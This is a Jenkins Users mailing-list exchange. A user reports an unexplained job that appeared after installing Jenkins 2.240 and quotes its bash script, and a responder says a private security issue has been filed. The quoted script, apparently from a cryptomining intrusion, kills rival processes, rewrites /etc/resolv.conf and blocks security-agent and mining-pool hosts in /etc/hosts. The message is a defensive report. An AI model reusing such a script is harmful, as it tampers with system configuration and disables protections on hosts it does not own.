Thanks for your report.
I filed an issue on your behalf in the Jenkins project's private security issue
tracker. You should have gotten an email notification from Jira about it.
Please provide more information there to help us investigate.
> On 22. Jun 2020, at 19:15, Randall Becker <the.n.e....@gmail.com> wrote:
>
> Hi All,
>
> We just installed Jenkins 2.240 and suddenly there is a job with some really
> strange content, including:
>
> #!/bin/bash
>
> threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head
> -n 1);
> hostHash=$(hostname -f | md5sum | cut -c1-8);
> echo "${hostHash} - ${threadCount}";
> ktr () {
> killall trace;pkill -9 -f trace;killall -s SIGKILL trace
> killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
> killall viunix;pkill viunix;killall -s SIGKILL viunix
> kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
> kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
> kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
> echo kill
> }
>
> ktr
> ktr
> ktr
> echo plsfoodforcatsnlove
> echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >>
> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
> echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >>
> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
> echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo
> "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >>
> /etc/hosts
> echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0
> pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >>
> /etc/hosts
> echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
> echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
> echo "0.0.0.0 minexmr.com" >> /etc/hosts
>
> This is really creepy because this script cannot possibly run on our system
> (the good part). The bad part is that no one in our organization created this
> job. Is it possible that there is some malware floating around? Our Jenkins
> instance is hiding behind a firewall so there's no way in.
>
> Thanks,
> Randall
>
> --
> You received this message because you are subscribed to the Google Groups
> "Jenkins Users" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to jenkinsci-users+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
--
You received this message because you are subscribed to the Google Groups
"Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to jenkinsci-users+unsubscr...@googlegroups.com.
To view this discussion on the web visit
https://groups.google.com/d/msgid/jenkinsci-users/7C344B12-6DD6-42AD-B5F3-687EEC6012C8%40beckweb.net.
